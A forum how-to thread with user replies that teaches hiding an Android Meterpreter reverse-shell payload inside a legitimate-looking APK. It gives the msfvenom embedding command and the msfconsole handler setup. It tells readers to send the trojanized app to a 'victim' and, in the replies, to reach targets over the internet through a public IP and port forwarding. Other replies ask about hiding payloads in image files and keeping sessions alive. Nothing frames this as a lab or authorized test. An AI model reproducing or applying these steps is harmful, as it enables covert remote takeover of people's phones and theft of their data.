Forum Thread: Embedding Payload in an Innocent Looking .Apk File

Hello techies out there, Today We will be discussing about how we can embed our payload in any apk file.

I don't know if similar post is being published but till my knowledge its not!Actually there is a manual way published but it's too time consuming!

Now this question is asked by many users . So instead of commenting on every one of them I decided to write this How-to . Now since this is my first post , So, please be co-operative ;).

So , Let's Begin !

Step 1: Fire Up Your Kali

Now Obviously This Is The First Step So I Don't Need To Explain This Much!

Step 2: Creating and Embedding Payload

Write the following command in the terminal :

"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""

msfvenom -x "_path_to_your_apk_file_in_which_you_want_to_embed_payload " -p "android/meterpreter/reverse_https" LHOST=your_ip_address LPORT=your_port -o "your_output_apk__name"

"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""

Although You can use payload of your own choice but i prefer "https" for android cause it provides stable meterpreter session !

_In Case , You Get The Following Error :
"Error: zipalign not found. If it's not in your PATH, please add it."
Simply , run this command in terminal:
apt-get install zipalign

Step 3: Creating Meterpreter Session

Start Console : msfconsole
_Start Handler : use exploit/multi/handler
Set Payload : set payload android/meterpreter/reverse_https
Set LHOST : set LHOST_your_ip_
Set LPORT: set LPORT _your_port_
Exploit : exploit

Now ,send the app to the victim's phone and let him install and wait for meterpreter session !
You Can also perform, this exploit over internet by assigning your public ip while creating payload !

10 Responses

Can you explain this statement, " You Can also perform, this exploit over internet by assigning your public ip while creating payload !" Further??

It means that you can perform this attack over internet/WAN by just assigning LHOST as your public ip address while creating and embedding payload as shown in Step 2

When u are in a network, using router, ur device will be assigned with a private ip which is valid only inside ur network. So ur payload listener won't be able to listen to devices outside ur network.. Instead, if u use ur public ip(ur router's original ip) u can access the device remotely. U can get ur public ip by googling "what is my ip"

for L PORT you set your routers IP address. Then just do port forwarding to your machine.

i just updated msfconsole and now my all payload is not working it says that my port is already open for other ip. so i killed that connection. but still not showing any result . help me a bit pls

  • Can we embed this type of payload(i.e., for Android) in an image file??
  • And how do I keep the connection active?it dies every 15 mins.

it is taking too long to inject a payload in apk

I use reverse tcp I find it more stable.Why should I use reverse http?I am confused :|

apt-get install zipalign did not worked for my Mac terminal. Please suggest me new method

thats the cmnd for linux terminal

Share Your Thoughts

  • Hot
  • Active